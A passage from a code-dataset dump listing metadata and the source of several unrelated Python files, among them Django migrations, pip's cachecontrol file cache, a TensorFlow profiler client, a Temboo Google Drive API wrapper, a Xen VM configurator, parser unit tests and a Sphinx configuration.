blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
288
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 684
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 147
values | src_encoding
stringclasses 25
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 128
12.7k
| extension
stringclasses 142
values | content
stringlengths 128
8.19k
| authors
listlengths 1
1
| author_id
stringlengths 1
132
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
e4ff0e7628f0b153ac84f54932d7be59746127b4
|
be0c6e2071945edcb47ee4f3fadc1f4629a2c6aa
|
/grandapp/migrations/0105_auto_20210224_1527.py
|
d80a750747203ef42ed7326139cdc3f30142b816
|
[] |
no_license
|
QuackenbushLab/grand
|
9719a395e6a30951c3ffdef1eccdb5e422da737c
|
f23031d1f240550d25c2842b4af0aae08c653bae
|
refs/heads/master
| 2023-08-10T09:58:58.381264
| 2023-07-25T18:23:26
| 2023-07-25T18:23:26
| 201,113,575
| 5
| 2
| null | 2022-06-24T19:11:29
| 2019-08-07T19:18:58
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 1,050
|
py
|
# Generated by Django 3.0.2 on 2021-02-24 15:27
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('grandapp', '0104_auto_20210224_0043'),
]
operations = [
migrations.AddField(
model_name='ggbmd1sample',
name='link',
field=models.CharField(default='', max_length=200),
preserve_default=False,
),
migrations.AddField(
model_name='ggbmd1sample',
name='size',
field=models.CharField(default='', max_length=200),
preserve_default=False,
),
migrations.AddField(
model_name='ggbmd2sample',
name='link',
field=models.CharField(default='', max_length=200),
preserve_default=False,
),
migrations.AddField(
model_name='ggbmd2sample',
name='size',
field=models.CharField(default='', max_length=200),
preserve_default=False,
),
]
|
[
"marouen.b.guebila@gmail.com"
] |
marouen.b.guebila@gmail.com
|
0c87e8d62731907e5730a66a9a585858c48baab9
|
45c86c7e7c6e84dcae3eba5544d93db6bee19905
|
/venv/lib/python2.7/site-packages/pip/_vendor/cachecontrol/caches/file_cache.py
|
50d18037e88dceca1d054d694fcec1680aab9b8b
|
[] |
no_license
|
5eanpoint/moweb
|
60b5ed74183b019e04e4fa243d3c1930c4cb4a64
|
bbf0d96b651230c231115a3eace7b950a908b57e
|
refs/heads/master
| 2016-09-14T05:29:27.601814
| 2016-05-24T06:40:05
| 2016-05-24T06:40:10
| 59,546,065
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,529
|
py
|
import hashlib
import os
from pip._vendor.lockfile import LockFile
from pip._vendor.lockfile.mkdirlockfile import MkdirLockFile
from ..cache import BaseCache
from ..controller import CacheController
def _secure_open_write(filename, fmode):
# We only want to write to this file, so open it in write only mode
flags = os.O_WRONLY
# os.O_CREAT | os.O_EXCL will fail if the file already exists, so we only
# will open *new* files.
# We specify this because we want to ensure that the mode we pass is the
# mode of the file.
flags |= os.O_CREAT | os.O_EXCL
# Do not follow symlinks to prevent someone from making a symlink that
# we follow and insecurely open a cache file.
if hasattr(os, "O_NOFOLLOW"):
flags |= os.O_NOFOLLOW
# On Windows we'll mark this file as binary
if hasattr(os, "O_BINARY"):
flags |= os.O_BINARY
# Before we open our file, we want to delete any existing file that is
# there
try:
os.remove(filename)
except (IOError, OSError):
# The file must not exist already, so we can just skip ahead to opening
pass
# Open our file, the use of os.O_CREAT | os.O_EXCL will ensure that if a
# race condition happens between the os.remove and this line, that an
# error will be raised. Because we utilize a lockfile this should only
# happen if someone is attempting to attack us.
fd = os.open(filename, flags, fmode)
try:
return os.fdopen(fd, "wb")
except:
# An error occurred wrapping our FD in a file object
os.close(fd)
raise
class FileCache(BaseCache):
def __init__(self, directory, forever=False, filemode=0o0600,
dirmode=0o0700, use_dir_lock=None, lock_class=None):
if use_dir_lock is not None and lock_class is not None:
raise ValueError("Cannot use use_dir_lock and lock_class together")
if use_dir_lock:
lock_class = MkdirLockFile
if lock_class is None:
lock_class = LockFile
self.directory = directory
self.forever = forever
self.filemode = filemode
self.dirmode = dirmode
self.lock_class = lock_class
@staticmethod
def encode(x):
return hashlib.sha224(x.encode()).hexdigest()
def _fn(self, name):
# NOTE: This method should not change as some may depend on it.
# See: https://github.com/ionrock/cachecontrol/issues/63
hashed = self.encode(name)
parts = list(hashed[:5]) + [hashed]
return os.path.join(self.directory, *parts)
def get(self, key):
name = self._fn(key)
if not os.path.exists(name):
return None
with open(name, 'rb') as fh:
return fh.read()
def set(self, key, value):
name = self._fn(key)
# Make sure the directory exists
try:
os.makedirs(os.path.dirname(name), self.dirmode)
except (IOError, OSError):
pass
with self.lock_class(name) as lock:
# Write our actual file
with _secure_open_write(lock.path, self.filemode) as fh:
fh.write(value)
def delete(self, key):
name = self._fn(key)
if not self.forever:
os.remove(name)
def url_to_file_path(url, filecache):
"""Return the file cache path based on the URL.
This does not ensure the file exists!
"""
key = CacheController.cache_url(url)
return filecache._fn(key)
|
[
"seanpoint@icloud.com"
] |
seanpoint@icloud.com
|
3440ae0cb78e579db0a6945b28742609be05790a
|
0d77846403606b8300a53e05cd2103d5470b6a6a
|
/tensorflow/python/profiler/profiler_client.py
|
dc542e2c726ecdbd9c79293f77ca662075532b7a
|
[
"Apache-2.0"
] |
permissive
|
alubanana/tensorflow
|
e7cb694073773be4c46607e7af4fb8ed9c74b812
|
454f89ab3baacbac567d6bcceef4c743f23ce58b
|
refs/heads/master
| 2021-01-04T15:44:16.441471
| 2020-02-14T22:50:45
| 2020-02-14T22:56:47
| 240,614,446
| 1
| 0
|
Apache-2.0
| 2020-02-14T23:12:02
| 2020-02-14T23:12:01
| null |
UTF-8
|
Python
| false
| false
| 2,762
|
py
|
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Profiler client APIs."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python import pywrap_tfe
from tensorflow.python.client import pywrap_tf_session
from tensorflow.python.framework import c_api_util
from tensorflow.python.framework import errors
def trace(service_addr,
logdir,
duration_ms,
worker_list='',
num_tracing_attempts=3):
"""Sends grpc requests to profiler server to perform on-demand profiling.
This method will block caller thread until receives tracing result.
Args:
service_addr: Address of profiler service e.g. localhost:6009.
logdir: Path of TensorBoard log directory e.g. /tmp/tb_log.
duration_ms: Duration of tracing or monitoring in ms.
worker_list: Optional. The list of workers that we are about to profile in
the current session (TPU only).
num_tracing_attempts: Optional. Automatically retry N times when no trace
event is collected (default 3).
Raises:
UnavailableError: If no trace event is collected.
"""
if not pywrap_tfe.TFE_ProfilerClientStartTracing(
service_addr, logdir, worker_list, True, duration_ms,
num_tracing_attempts):
raise errors.UnavailableError(None, None, 'No trace event is collected.')
def monitor(service_addr, duration_ms, level=1):
"""Sends grpc requests to profiler server to perform on-demand monitoring.
This method will block caller thread until receives monitoring result.
Args:
service_addr: Address of profiler service e.g. localhost:6009.
duration_ms: Duration of monitoring in ms.
level: Choose a monitoring level between 1 and 2 to monitor your
job. Level 2 is more verbose than level 1 and shows more metrics.
Returns:
A string of monitoring output.
"""
with c_api_util.tf_buffer() as buffer_:
pywrap_tfe.TFE_ProfilerClientMonitor(service_addr, duration_ms, level, True,
buffer_)
return pywrap_tf_session.TF_GetBuffer(buffer_)
|
[
"gardener@tensorflow.org"
] |
gardener@tensorflow.org
|
d22f1d29c71d26afd2458a666800317fbbbe8db4
|
91e9d429f8e34fd48d5e34a898b32bc090660fe1
|
/core/migrations/0008_article_featured_mob_img.py
|
ab29fbd735ece0954ef2f0c6a20182b6c8281707
|
[] |
no_license
|
sherrywilly/blog-graphene
|
b286d4ba9a5a3499aefc684399630bcbd348ba8f
|
b05430896dff6b8944b2e6f5f30b6cfd875dc820
|
refs/heads/main
| 2023-07-14T22:20:29.973765
| 2021-08-07T06:35:32
| 2021-08-07T06:35:32
| 392,514,698
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 446
|
py
|
# Generated by Django 3.2.6 on 2021-08-03 09:16
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('core', '0007_auto_20210803_0850'),
]
operations = [
migrations.AddField(
model_name='article',
name='featured_mob_img',
field=models.ImageField(blank=True, editable=False, null=True, upload_to='feature_images/'),
),
]
|
[
"sherrywilson521@gmail.com"
] |
sherrywilson521@gmail.com
|
fde06b2ff44e982bb2583bb88563f02a0ba24b88
|
7cd9b9f41fdbf52de6e4393c43e3ff4e7466b417
|
/pokemon/urls.py
|
68b22f96b1bbe9442e8b4515f49e8579b6d1466c
|
[] |
no_license
|
BaeJuneHyuck/demo-pusan-univ-201907-django
|
36f5be596c6850acc211358276c66df127e05633
|
4ef9e64a42a977e0b435fb2f83842433fac53bf3
|
refs/heads/master
| 2022-01-22T21:35:57.419007
| 2019-07-23T06:51:14
| 2019-07-23T06:51:14
| 198,371,100
| 1
| 0
| null | 2019-07-23T06:56:52
| 2019-07-23T06:56:51
| null |
UTF-8
|
Python
| false
| false
| 242
|
py
|
from django.urls import path
from pokemon.views import index, pokemon_new, pokemon_edit
urlpatterns = [
path('', index),
path('new/', pokemon_new),
path('<int:pk>/', pokemon_edit),
# re_path(r'(?P<pk>\d+)', pokemon_edit),
]
|
[
"me@askcompany.kr"
] |
me@askcompany.kr
|
b4150d116c9be477b3d501231d89ebeae46b0aa9
|
e44c1ac44a3cc912fbeaa0152b9294a03fd893ea
|
/test/test_boolean_syntax.py
|
5239ddb35aae0c52b65012e4a9d113be293c672b
|
[
"BSD-2-Clause"
] |
permissive
|
umd-lhcb/pyTuplingUtils
|
ca03db1975f7f283caab1436ac1c5d85fad75d2a
|
85f3ca90f01389f834af6de1044364843210c4c5
|
refs/heads/master
| 2023-03-10T00:12:40.922444
| 2023-03-03T23:31:09
| 2023-03-03T23:31:09
| 215,201,702
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,192
|
py
|
#!/usr/bin/env python3
#
# Authorop: Yipeng Sun
# License: BSD 2-clause
# Last Change: Thu Jun 18, 2020 at 02:47 AM +0800
import unittest
from context import pyTuplingUtils as ptu
parser = ptu.boolean.syntax.boolean_parser.parse
class ArithmeticTest(unittest.TestCase):
def test_var(self):
self.assertEqual(
parser('a').pretty(),
"var\ta\n"
)
self.assertEqual(
parser('-a').pretty(),
"neg\n"
" var\ta\n"
)
self.assertEqual(
parser('a1').pretty(),
"var\ta1\n"
)
self.assertEqual(
parser('a_1b').pretty(),
"var\ta_1b\n"
)
def test_num(self):
self.assertEqual(
parser('1').pretty(),
"num\t1\n"
)
self.assertEqual(
parser('+1').pretty(),
"num\t+1\n"
)
def test_negative_num(self):
self.assertEqual(
parser('-1.6').pretty(),
"num\t-1.6\n"
)
self.assertEqual(
parser('+1').pretty(),
"num\t+1\n"
)
def test_add(self):
self.assertEqual(
parser('-1 +2.3').pretty(),
"add\n"
" num\t-1\n"
" num\t2.3\n"
)
def test_add_sub(self):
self.assertEqual(
parser('-1 +2.3 - 10').pretty(),
"sub\n"
" add\n"
" num\t-1\n"
" num\t2.3\n"
" num\t10\n"
)
def test_add_mul(self):
self.assertEqual(
parser('-1 +2.3 * 10').pretty(),
"add\n"
" num\t-1\n"
" mul\n"
" num\t2.3\n"
" num\t10\n"
)
def test_add_mul_par(self):
self.assertEqual(
parser('-(1 +2.3) * 10').pretty(),
"mul\n"
" neg\n"
" add\n"
" num\t1\n"
" num\t2.3\n"
" num\t10\n"
)
class BooleanTest(unittest.TestCase):
def test_comp(self):
self.assertEqual(
parser('!(-a_2 +2.3) ').pretty(),
"comp\n"
" add\n"
" neg\n"
" var\ta_2\n"
" num\t2.3\n"
)
def test_eq(self):
self.assertEqual(
parser('a == b').pretty(),
"eq\n"
" var\ta\n"
" var\tb\n"
)
self.assertEqual(
parser('a == 1').pretty(),
"eq\n"
" var\ta\n"
" num\t1\n"
)
self.assertEqual(
parser('a <= -1+x').pretty(),
"lte\n"
" var\ta\n"
" add\n"
" num\t-1\n"
" var\tx\n"
)
def test_bool(self):
self.assertEqual(
parser('a & 1').pretty(),
"andop\n"
" var\ta\n"
" num\t1\n"
)
self.assertEqual(
parser('True | False').pretty(),
"orop\n"
" bool\tTrue\n"
" bool\tFalse\n"
)
self.assertEqual(
parser('True | False & True').pretty(),
"orop\n"
" bool\tTrue\n"
" andop\n"
" bool\tFalse\n"
" bool\tTrue\n"
)
self.assertEqual(
parser('(True | False) & !True | false').pretty(),
"orop\n"
" andop\n"
" orop\n"
" bool\tTrue\n"
" bool\tFalse\n"
" comp\n"
" bool\tTrue\n"
" bool\tfalse\n"
)
def test_comb(self):
self.assertEqual(
parser('a >= !(-1+x)*3').pretty(),
"gte\n"
" var\ta\n"
" comp\n"
" mul\n"
" add\n"
" num\t-1\n"
" var\tx\n"
" num\t3\n"
)
self.assertEqual(
parser('a >= !(-1+x)*3 | x<8 & y != -(z+3)').pretty(),
"orop\n"
" gte\n"
" var\ta\n"
" comp\n"
" mul\n"
" add\n"
" num\t-1\n"
" var\tx\n"
" num\t3\n"
" andop\n"
" lt\n"
" var\tx\n"
" num\t8\n"
" neq\n"
" var\ty\n"
" neg\n"
" add\n"
" var\tz\n"
" num\t3\n"
)
self.assertEqual(
parser('a >= !(-1+x)*3 | x<8 & y != -(z+3)').pretty(),
parser('a >= !(-1+x)*3 | (x<8 & y != -(z+3))').pretty()
)
class FunctionCallTest(unittest.TestCase):
def test_func_call_zero_arg(self):
self.assertEqual(
parser('(some_func0())').pretty(),
"func_call\tsome_func0\n"
)
def test_func_call_one_arg(self):
self.assertEqual(
parser('some_func1(arg1)').pretty(),
"func_call\n"
" some_func1\n"
" arglist\n"
" var\targ1\n"
)
def test_func_call_two_args(self):
self.assertEqual(
parser('some_func2(arg1, arg2)').pretty(),
"func_call\n"
" some_func2\n"
" arglist\n"
" var\targ1\n"
" var\targ2\n"
)
def test_func_call_arithmetic(self):
self.assertEqual(
parser('arith_func((arg1+2)*val3, arg2)').pretty(),
"func_call\n"
" arith_func\n"
" arglist\n"
" mul\n"
" add\n"
" var\targ1\n"
" num\t2\n"
" var\tval3\n"
" var\targ2\n"
)
def test_func_call_nested(self):
self.assertEqual(
parser('arith_func(inner(arg1+2)*val3, arg2)').pretty(),
"func_call\n"
" arith_func\n"
" arglist\n"
" mul\n"
" func_call\n"
" inner\n"
" arglist\n"
" add\n"
" var\targ1\n"
" num\t2\n"
" var\tval3\n"
" var\targ2\n"
)
def test_func_call_nested_boolean_op(self):
self.assertEqual(
parser('arith_func(inner(arg1+2)*val3, arg2) > stuff(a)').pretty(),
"gt\n"
" func_call\n"
" arith_func\n"
" arglist\n"
" mul\n"
" func_call\n"
" inner\n"
" arglist\n"
" add\n"
" var\targ1\n"
" num\t2\n"
" var\tval3\n"
" var\targ2\n"
" func_call\n"
" stuff\n"
" arglist\n"
" var\ta\n"
)
if __name__ == '__main__':
unittest.main()
|
[
"syp@umd.edu"
] |
syp@umd.edu
|
338d1428bc7508a2da49be3bd292cdb85916ced9
|
44064ed79f173ddca96174913910c1610992b7cb
|
/Second_Processing_app/temboo/Library/Google/Drive/Files/Update.py
|
5ed78c1781be712f6acaa6a31eb70220ec8e1590
|
[] |
no_license
|
dattasaurabh82/Final_thesis
|
440fb5e29ebc28dd64fe59ecd87f01494ed6d4e5
|
8edaea62f5987db026adfffb6b52b59b119f6375
|
refs/heads/master
| 2021-01-20T22:25:48.999100
| 2014-10-14T18:58:00
| 2014-10-14T18:58:00
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,745
|
py
|
# -*- coding: utf-8 -*-
###############################################################################
#
# Update
# Updates the metadata or content of an existing file.
#
# Python version 2.6
#
###############################################################################
from temboo.core.choreography import Choreography
from temboo.core.choreography import InputSet
from temboo.core.choreography import ResultSet
from temboo.core.choreography import ChoreographyExecution
import json
class Update(Choreography):
def __init__(self, temboo_session):
"""
Create a new instance of the Update Choreo. A TembooSession object, containing a valid
set of Temboo credentials, must be supplied.
"""
Choreography.__init__(self, temboo_session, '/Library/Google/Drive/Files/Update')
def new_input_set(self):
return UpdateInputSet()
def _make_result_set(self, result, path):
return UpdateResultSet(result, path)
def _make_execution(self, session, exec_id, path):
return UpdateChoreographyExecution(session, exec_id, path)
class UpdateInputSet(InputSet):
"""
An InputSet with methods appropriate for specifying the inputs to the Update
Choreo. The InputSet object is used to specify input parameters when executing this Choreo.
"""
def set_RequestBody(self, value):
"""
Set the value of the RequestBody input for this Choreo. ((conditional, json) A JSON representation of fields in a file resource. File metadata information (such as the title) can be updated using this input. See documentation for formatting examples.)
"""
InputSet._set_input(self, 'RequestBody', value)
def set_AccessToken(self, value):
"""
Set the value of the AccessToken input for this Choreo. ((optional, string) A valid access token retrieved during the OAuth2 process. This is required unless you provide the ClientID, ClientSecret, and RefreshToken to generate a new access token.)
"""
InputSet._set_input(self, 'AccessToken', value)
def set_ClientID(self, value):
"""
Set the value of the ClientID input for this Choreo. ((conditional, string) The Client ID provided by Google. Required unless providing a valid AccessToken.)
"""
InputSet._set_input(self, 'ClientID', value)
def set_ClientSecret(self, value):
"""
Set the value of the ClientSecret input for this Choreo. ((conditional, string) The Client Secret provided by Google. Required unless providing a valid AccessToken.)
"""
InputSet._set_input(self, 'ClientSecret', value)
def set_ContentType(self, value):
"""
Set the value of the ContentType input for this Choreo. ((conditional, string) The Content-Type of the file that is being updated (i.e. image/jpeg). Required if modifying the file content.)
"""
InputSet._set_input(self, 'ContentType', value)
def set_Convert(self, value):
"""
Set the value of the Convert input for this Choreo. ((optional, boolean) Whether to convert this file to the corresponding Google Docs format. (Default: false).)
"""
InputSet._set_input(self, 'Convert', value)
def set_Fields(self, value):
"""
Set the value of the Fields input for this Choreo. ((optional, string) Selector specifying which fields to include in a partial response.)
"""
InputSet._set_input(self, 'Fields', value)
def set_FileContent(self, value):
"""
Set the value of the FileContent input for this Choreo. ((conditional, string) The new Base64 encoded contents of the file that is being updated.)
"""
InputSet._set_input(self, 'FileContent', value)
def set_FileID(self, value):
"""
Set the value of the FileID input for this Choreo. ((required, string) The id of the file to update.)
"""
InputSet._set_input(self, 'FileID', value)
def set_OCR(self, value):
"""
Set the value of the OCR input for this Choreo. ((optional, boolean) Whether to attempt OCR on .jpg, .png, .gif, or .pdf uploads. (Default: false))
"""
InputSet._set_input(self, 'OCR', value)
def set_OcrLanguage(self, value):
"""
Set the value of the OcrLanguage input for this Choreo. ((optional, string) If ocr is true, hints at the language to use. Valid values are ISO 639-1 codes.)
"""
InputSet._set_input(self, 'OcrLanguage', value)
def set_Pinned(self, value):
"""
Set the value of the Pinned input for this Choreo. ((optional, boolean) Whether to pin the new revision. (Default: false).)
"""
InputSet._set_input(self, 'Pinned', value)
def set_RefreshToken(self, value):
"""
Set the value of the RefreshToken input for this Choreo. ((conditional, string) An OAuth refresh token used to generate a new access token when the original token is expired. Required unless providing a valid AccessToken.)
"""
InputSet._set_input(self, 'RefreshToken', value)
def set_SetModifiedDate(self, value):
"""
Set the value of the SetModifiedDate input for this Choreo. ((optional, boolean) Whether to set the modified date with the supplied modified date.)
"""
InputSet._set_input(self, 'SetModifiedDate', value)
def set_SourceLanguage(self, value):
"""
Set the value of the SourceLanguage input for this Choreo. ((optional, string) The language of the original file to be translated.)
"""
InputSet._set_input(self, 'SourceLanguage', value)
def set_TargetLanguage(self, value):
"""
Set the value of the TargetLanguage input for this Choreo. ((optional, string) Target language to translate the file to. If no sourceLanguage is provided, the API will attempt to detect the language.)
"""
InputSet._set_input(self, 'TargetLanguage', value)
def set_TimedTextLanguage(self, value):
"""
Set the value of the TimedTextLanguage input for this Choreo. ((optional, string) The language of the timed text.)
"""
InputSet._set_input(self, 'TimedTextLanguage', value)
def set_TimedTextTrackName(self, value):
"""
Set the value of the TimedTextTrackName input for this Choreo. ((optional, string) The timed text track name.)
"""
InputSet._set_input(self, 'TimedTextTrackName', value)
def set_UpdateViewedDate(self, value):
"""
Set the value of the UpdateViewedDate input for this Choreo. ((optional, boolean) Whether to update the view date after successfully updating the file.)
"""
InputSet._set_input(self, 'UpdateViewedDate', value)
class UpdateResultSet(ResultSet):
"""
A ResultSet with methods tailored to the values returned by the Update Choreo.
The ResultSet object is used to retrieve the results of a Choreo execution.
"""
def getJSONFromString(self, str):
return json.loads(str)
def get_Response(self):
"""
Retrieve the value for the "Response" output from this Choreo execution. ((json) The response from Google.)
"""
return self._output.get('Response', None)
def get_NewAccessToken(self):
"""
Retrieve the value for the "NewAccessToken" output from this Choreo execution. ((string) Contains a new AccessToken when the RefreshToken is provided.)
"""
return self._output.get('NewAccessToken', None)
class UpdateChoreographyExecution(ChoreographyExecution):
def _make_result_set(self, response, path):
return UpdateResultSet(response, path)
|
[
"dattasaurabh82@gmail.com"
] |
dattasaurabh82@gmail.com
|
9c59f9dbd1305703fbe6cfa40102879fac180355
|
de6fb3a55196b6bd36a4fda0e08ad658679fb7a1
|
/vt_manager/src/python/agent/xen/provisioning/configurators/mediacat/MediacatVMConfigurator.py
|
1c32a6c5a7a87130868b322f6583514d2cd725a1
|
[
"BSD-3-Clause",
"Apache-2.0"
] |
permissive
|
dana-i2cat/felix
|
4a87af639e4c7db686bfa03f1ae4ce62711615e3
|
059ed2b3308bda2af5e1942dc9967e6573dd6a53
|
refs/heads/master
| 2021-01-02T23:12:43.840754
| 2016-02-04T10:04:24
| 2016-02-04T10:04:24
| 17,132,912
| 4
| 4
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,703
|
py
|
import shutil
import os
import jinja2
import subprocess
from xen.provisioning.hdmanagers.LVMHdManager import LVMHdManager
from xen.provisioning.HdManager import HdManager
from settings.settingsLoader import OXA_XEN_SERVER_KERNEL,OXA_XEN_SERVER_INITRD,OXA_DEBIAN_INTERFACES_FILE_LOCATION,OXA_DEBIAN_UDEV_FILE_LOCATION
class MediacatVMConfigurator:
''' Private methods '''
@staticmethod
def __createParavirtualizationVM(vm):
swap = 0
if len(vm.xen_configuration.users.user) == 1 and vm.xen_configuration.users.user[0].name == "root":
passwd = str(vm.xen_configuration.users.user[0].password)
if vm.xen_configuration.memory_mb < 1024:
swap = vm.xen_configuration.memory_mb*2
else:
swap = 1024
p = subprocess.Popen(['/usr/bin/xen-create-image','--hostname=' + vm.name,'--size=' + str(vm.xen_configuration.hd_size_gb) + 'Gb','--swap=' + str(swap) + 'Mb','--memory=' + str(vm.xen_configuration.memory_mb) + 'Mb','--arch=amd64','--password=' + passwd,'--output=' + LVMHdManager.getConfigFileDir(vm), '--role=udev'], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
p.wait()
@staticmethod
def __createHVMFileHdConfigFile(vm,env):
template_name = "mediacatHVMFileHd.pt"
template = env.get_template(template_name)
#Set vars&render
output = template.render(
kernelImg=OXA_XEN_SERVER_KERNEL,
initrdImg=OXA_XEN_SERVER_INITRD,
vm=vm)
#write file
cfile = open(HdManager.getConfigFilePath(vm),'w')
cfile.write(output)
cfile.close()
#Public methods
@staticmethod
def getIdentifier():
return MediacatVMConfigurator.__name__
@staticmethod
def configureVmDisk(vm,path):
return
@staticmethod
def createVmConfigurationFile(vm):
#get env
template_dirs = []
template_dirs.append(os.path.join(os.path.dirname(__file__), 'templates/'))
env = jinja2.Environment(loader=jinja2.FileSystemLoader(template_dirs))
if vm.xen_configuration.hd_setup_type == "logical-volume-image" and vm.xen_configuration.virtualization_setup_type == "paravirtualization":
MediacatVMConfigurator.__createParavirtualizationVM(vm)
elif vm.xen_configuration.hd_setup_type == "logical-volume-image" and vm.xen_configuration.virtualization_setup_type == "hardware-assisted-virtualization":
MediacatVMConfigurator.__createHVMFileHdConfigFile(vm,env)
else:
raise Exception("type of file or type of virtualization not supported for the creation of xen vm configuration file")
|
[
"jenkins@integration.localhost"
] |
jenkins@integration.localhost
|
f5bd5d0daea26ef86acd064dbec79ff7205d9815
|
10b5a703c0166b55331513d2a9aead687032e804
|
/leetcode1578.py
|
7f4f21ed382eed47d291365b4de17dc2a0e596ab
|
[] |
no_license
|
jack456054/leetcode
|
f2d623d5683098b2038322ee3eef81dc020f6fb1
|
24f0075909f8620513f6f21c9ad3dc299dee8967
|
refs/heads/master
| 2022-11-12T18:01:52.832206
| 2022-11-10T07:24:39
| 2022-11-10T07:24:39
| 125,793,890
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,450
|
py
|
class Solution:
# def minCost(self, colors: str, neededTime: List[int]) -> int:
# if len(colors) == 1:
# return 0
# current_color: str = None
# time_list: List[int] = []
# results: int = 0
# for index, color in enumerate(colors):
# if current_color == color:
# heappush(time_list, neededTime[index])
# else:
# tl_len = len(time_list)
# if tl_len > 1:
# results += sum(nsmallest(tl_len - 1, time_list))
# current_color = color
# time_list = [neededTime[index]]
# tl_len = len(time_list)
# if tl_len > 1:
# results += sum(nsmallest(tl_len - 1, time_list))
# return results
def minCost(self, colors: str, neededTime: List[int]) -> int:
if len(colors) == 1:
return 0
current_color: str = colors[0]
current_largest: int = neededTime[0]
results: int = neededTime[0]
for index, color in enumerate(colors[1:]):
results += neededTime[index + 1]
if current_color == color:
current_largest = max(current_largest, neededTime[index + 1])
else:
results -= current_largest
current_color = color
current_largest = neededTime[index + 1]
results -= current_largest
return results
|
[
"jack456054@hotmail.com"
] |
jack456054@hotmail.com
|
e2a991b355677ee0a574dce0a2c19d1b6cac5bc7
|
2256a61b57eed52ce5b3dd19e54108545e3fa1a1
|
/sandbox/ipython/mydemo.py
|
fd31887d834e800fcd42827f23ebcf608aea26b6
|
[
"Apache-2.0"
] |
permissive
|
hubitor/progs
|
18877b7dbd455f1192c96ebe1905f67329d1c749
|
e4537da6da47d380a1a1a04e8068866013c7b7b6
|
refs/heads/master
| 2020-04-28T18:49:23.446076
| 2019-02-18T07:59:28
| 2019-02-18T07:59:28
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 128
|
py
|
#! /usr/bin/env python
# -*- coding: latin-1 -*-
from IPython.lib.demo import Demo
mydemo = Demo('myscript.py')
#mydemo()
|
[
"romain.boman@gmail.com"
] |
romain.boman@gmail.com
|
1f87942cf0798f90d596f602e6524b16e1aed34a
|
df4b577668b830fcb41be675d691a72b952e892b
|
/releasenotes/source/conf.py
|
9550aff663dfded18ef4e450b36cecf4ea41502c
|
[
"Apache-2.0"
] |
permissive
|
4383/tobiko
|
37ef7bfb3b51918825c4c412136467fb32850494
|
f8e6916db890021fa17ddbfc5e6007a25093c8cb
|
refs/heads/master
| 2020-10-01T00:03:27.723538
| 2019-12-11T16:01:53
| 2019-12-11T16:04:14
| 227,405,383
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,970
|
py
|
# Copyright 2019 Red Hat
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
# Configuration file for the Sphinx documentation builder.
#
# This file only contains a selection of the most common options. For a full
# list see the documentation:
# http://www.sphinx-doc.org/en/master/config
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
TOBIKO_DIR = os.path.abspath(os.path.join(BASE_DIR, "..", ".."))
sys.path.insert(0, TOBIKO_DIR)
# -- Project information -----------------------------------------------------
project = 'Tobiko Release Notes'
copyright = "2019, Red Hat"
author = "Tobiko's Team"
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# Version info
from tobiko import version
release = version.release
# The short X.Y version.
version = version.version
# -- General configuration ---------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'reno.sphinxext',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = []
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = []
